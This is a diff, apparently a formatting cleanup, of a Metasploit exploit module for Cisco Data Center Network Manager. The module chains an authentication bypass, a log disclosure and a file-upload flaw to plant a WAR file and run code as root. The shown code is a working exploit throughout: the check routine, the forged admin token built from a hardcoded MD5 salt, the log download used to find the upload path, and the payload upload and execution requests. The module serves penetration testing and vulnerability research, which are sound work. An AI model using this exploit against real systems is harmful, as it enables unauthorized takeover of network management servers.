@@ -11,26 +11,26 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution',
-      'Description'    => %q{
-        DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
-        An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
-        directory and achieve remote code execution as root.
-        This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on
-        versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct
-        directory for the WAR file upload.
-        This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
-        work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
-        (see References to understand why).
-      },
-      'Author'         =>
-        [
-          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
+          An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
+          directory and achieve remote code execution as root.
+          This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on
+          versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct
+          directory for the WAR file upload.
+          This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
+          work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
+          (see References to understand why).
+        },
+        'Author' => [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2019-1619' ], # auth bypass
           [ 'CVE', '2019-1620' ], # file upload
           [ 'CVE', '2019-1622' ], # log download
@@ -39,10 +39,9 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-dcnm-rce.txt' ],
           [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jul/7' ]
         ],
-      'Platform'       => 'java',
-      'Arch'           => ARCH_JAVA,
-      'Targets'        =>
-        [
+        'Platform' => 'java',
+        'Arch' => ARCH_JAVA,
+        'Targets' => [
           [ 'Automatic', {} ],
           [
             'Cisco DCNM 11.1(1)', {}
@@ -54,37 +53,44 @@ class MetasploitModule < Msf::Exploit::Remote
             'Cisco DCNM 10.4(2)', {}
           ]
         ],
-      'Privileged'     => true,
-      'DefaultOptions' => { 'WfsDelay' => 10 },
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2019-06-26'
-    ))
+        'Privileged' => true,
+        'DefaultOptions' => { 'WfsDelay' => 10 },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2019-06-26',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(443),
         OptBool.new('SSL', [true, 'Connect with TLS', true]),
-        OptString.new('TARGETURI', [true,  "Default server path", '/']),
-        OptString.new('USERNAME', [true,  "Username for auth (required only for 11.0(1) and above", 'admin']),
-        OptString.new('PASSWORD', [true,  "Password for auth (required only for 11.0(1) and above", 'admin']),
-      ])
+        OptString.new('TARGETURI', [true, "Default server path", '/']),
+        OptString.new('USERNAME', [true, "Username for auth (required only for 11.0(1) and above", 'admin']),
+        OptString.new('PASSWORD', [true, "Password for auth (required only for 11.0(1) and above", 'admin']),
+      ]
+    )
   end
 
   def check
     # at the moment this is the best way to detect
     # check if pmreport and fileUpload servlets return a 500 error with no params
     res = send_request_cgi(
-      'uri'    => normalize_uri(target_uri.path, 'fm', 'pmreport'),
-      'vars_get'  =>
+      'uri' => normalize_uri(target_uri.path, 'fm', 'pmreport'),
+      'vars_get' =>
       {
-        'token'  => rand_text_alpha(5..20)
+        'token' => rand_text_alpha(5..20)
       },
       'method' => 'GET'
     )
     if res && res.code == 500
       res = send_request_cgi(
-        'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
-        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
+        'method' => 'GET'
       )
       if res && res.code == 500
         return CheckCode::Detected
@@ -99,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return target
     else
       res = send_request_cgi(
-        'uri'    => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about','version'),
+        'uri' => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about', 'version'),
         'method' => 'GET'
       )
       if res && res.code == 200
@@ -129,13 +135,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def auth_v11
     res = send_request_cgi(
-      'uri'    => normalize_uri(target_uri.path, 'fm/'),
+      'uri' => normalize_uri(target_uri.path, 'fm/'),
       'method' => 'GET',
-      'vars_get'  =>
+      'vars_get' =>
       {
-        'userName'  => datastore['USERNAME'],
-        'password'  => datastore['PASSWORD']
-      },
+        'userName' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
     )
 
     if res && res.code == 200
@@ -153,7 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def auth_v10
     # step 1: get a JSESSIONID cookie and the server Date header
     res = send_request_cgi(
-      'uri'    => normalize_uri(target_uri.path, 'fm/'),
+      'uri' => normalize_uri(target_uri.path, 'fm/'),
       'method' => 'GET'
     )
 
@@ -168,17 +174,17 @@ class MetasploitModule < Msf::Exploit::Remote
       # username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF
       session_id = rand(1000..50000).to_s
       md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s +
-        "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF"
+                               "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF"
       md5_str = Base64.strict_encode64(md5)
 
       # step 3: authenticate our cookie as admin
       # token format: sessionId.sysTime.md5_str.username
       res = send_request_cgi(
-        'uri'    => normalize_uri(target_uri.path, 'fm', 'pmreport'),
+        'uri' => normalize_uri(target_uri.path, 'fm', 'pmreport'),
         'cookie' => jsession,
-        'vars_get'  =>
+        'vars_get' =>
         {
-          'token'  => "#{session_id}.#{server_date.to_s}.#{md5_str}.admin"
+          'token' => "#{session_id}.#{server_date.to_s}.#{md5_str}.admin"
         },
         'method' => 'GET'
       )
@@ -192,7 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # use CVE-2019-1622 to fetch the logs unauthenticated, and get the WAR upload path from jboss*.log
   def get_war_path
     res = send_request_cgi(
-      'uri'    => normalize_uri(target_uri.path, 'fm', 'log', 'fmlogs.zip'),
+      'uri' => normalize_uri(target_uri.path, 'fm', 'log', 'fmlogs.zip'),
       'method' => 'GET'
     )
 
@@ -216,7 +222,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-
   def exploit
     target = target_select
 
@@ -255,11 +260,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("#{peer} - Uploading payload...")
     res = send_request_cgi(
-      'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
+      'uri' => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
       'method' => 'POST',
-      'data'   => data,
+      'data' => data,
       'cookie' => jsession,
-      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
     )
 
     if res && res.code == 200 && res.body[/#{fname}/]
@@ -269,7 +274,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       print_status("#{peer} - Executing payload...")
       send_request_cgi(
-        'uri'    => normalize_uri(target_uri.path, app_base),
+        'uri' => normalize_uri(target_uri.path, app_base),
         'method' => 'GET'
       )
     else
